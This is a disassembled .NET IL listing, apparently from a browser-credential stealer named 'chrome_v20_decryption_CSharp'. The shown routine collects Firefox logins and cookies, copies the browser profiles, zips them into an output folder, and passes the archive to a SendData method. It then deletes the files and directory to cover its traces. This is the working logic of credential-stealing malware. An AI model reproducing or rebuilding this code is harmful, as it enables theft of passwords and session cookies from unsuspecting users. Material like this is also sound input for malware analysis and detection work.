chrome_v20_decryption_CSharp.Firefox::GetLogins() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin>::get_Count() stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ble.s IL_0393: call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldloc.s V_16 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie>::get_Count() stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ble.s IL_03B7: call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldloc.s V_17 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::WriteFirefoxData(System.String) call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::CopyFirefoxProfiles(System.String) leave.s IL_03D0: nop pop <null> leave.s IL_03D0: nop nop <null> call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() stloc.s V_18 ldloc.s V_18 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0440: leave.s IL_044A ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_18 call System.String chrome_v20_decryption_CSharp.Program::ZipFolder(System.String) stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0432: nop ldloc.s V_19 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0432: nop ldloc.s V_19 newobj System.Void System.IO.FileInfo::.ctor(System.String) ldc.i4 50331648 conv.i8 <null> stloc.s V_20 callvirt System.Int64 System.IO.FileInfo::get_Length() ldloc.s V_20 pop <null> pop <null> ldloc.s V_19 call System.Void chrome_v20_decryption_CSharp.Program::SendData(System.String) nop <null> ldloc.s V_19 call System.Void System.IO.File::Delete(System.String) leave.s IL_0432: nop pop <null> leave.s IL_0432: nop nop <null> ldloc.s V_18 ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0440: leave.s IL_044A pop <null> leave.s IL_0440: leave.s IL_044A leave.s IL_044A: nop callvirt System.Exception System.Exception::get_InnerException() pop <null> leave.s IL_044A: nop nop <null> ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_045A: leave.s IL_0475 pop <null> leave.s IL_045A: leave.s IL_0475 leave.s IL_0475: ret pop <null> leave.s IL_0475: ret nop <null> call System.Void System.GC::Collect() call System.Void System.GC::WaitForPendingFinalizers() call System.Void System.GC::Collect() leave.s IL_0474: endfinally pop <null> leave.s IL_0474: endfinally endfinally <null> ret <null> |